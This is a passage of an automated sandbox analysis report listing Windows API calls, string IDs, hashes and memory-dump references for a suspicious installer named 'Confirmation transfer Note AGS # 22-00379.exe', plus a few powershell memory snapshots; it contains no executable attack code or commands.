                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                  • API String ID: 1451636040-1158693248
                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                  • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                  • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                  APIs
                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                  • DeleteObject.GDI32(00000000), ref: 00401D36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                  • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                  • Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                  • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                  APIs
                  • GetDC.USER32(?), ref: 00401D44
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirectRelease
                  • String ID:
                  • API String ID: 3808545654-0
                  • Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                  • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                  • Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                  • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                  APIs
                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                  • wsprintfW.USER32 ref: 00404A10
                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s
                  • API String ID: 3540041739-3551169577
                  • Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                  • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                  • Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                  • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                  APIs
                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                  • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                  • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                  • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                  APIs
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
                  • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: : Completed
                  • API String ID: 3677997916-2954849223
                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                  • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                  • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                  APIs
                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403342,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00405939
                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403342,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00405943
                  • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                  Strings
                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405933
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                  • API String ID: 2659869361-2382934351
                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                  • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                  • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                  APIs
                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                  • String ID:
                  • API String ID: 1404258612-0
                  • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                  • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                  • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                  • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00405135
                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                  • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                  • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                  APIs
                  • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004037F4,771B3420,0040361F,?), ref: 00403837
                  • GlobalFree.KERNEL32(?), ref: 0040383E
                  Strings
                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040382F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Free$GlobalLibrary
                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                  • API String ID: 1100898210-2382934351
                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                  • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                  • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                  APIs
                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405985
                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405995
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-3976562730
                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                  • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                  • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                  APIs
                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                  • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                  • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                  • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                  • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                  • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9
                  Memory Dump Source
                  • Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 28940db9ba5d448dd3079c283dbb4f471298faf85600ea2d972ac8ece8953ee2
                  • Instruction ID: 24716264741712794f2385998d895f6596973670909fd3cca5b553717bca41af
                  • Opcode Fuzzy Hash: 28940db9ba5d448dd3079c283dbb4f471298faf85600ea2d972ac8ece8953ee2
                  • Instruction Fuzzy Hash: B2B16171E00219DFDB24CFA9C8857ADBBF2AF48314F148A2DD815E7294EB74E845CB81
                  Memory Dump Source
                  • Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60fab0a62f7298dd3bbcbab130e2bb4e6a56c1ca3d67703fcd648a41bf0a0328
                  • Instruction ID: a203d9138a0ee4f2153179cdfbe5b1270e17dc61aa3f48745f63690a884464a9
                  • Opcode Fuzzy Hash: 60fab0a62f7298dd3bbcbab130e2bb4e6a56c1ca3d67703fcd648a41bf0a0328
                  • Instruction Fuzzy Hash: 6EB15171E00219CFEB14CFA9D881B9DBBF2AF48314F148A2DD615E7294EB74E845CB85
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7780000_powershell.jbxd
                  Similarity
                  • API ID:
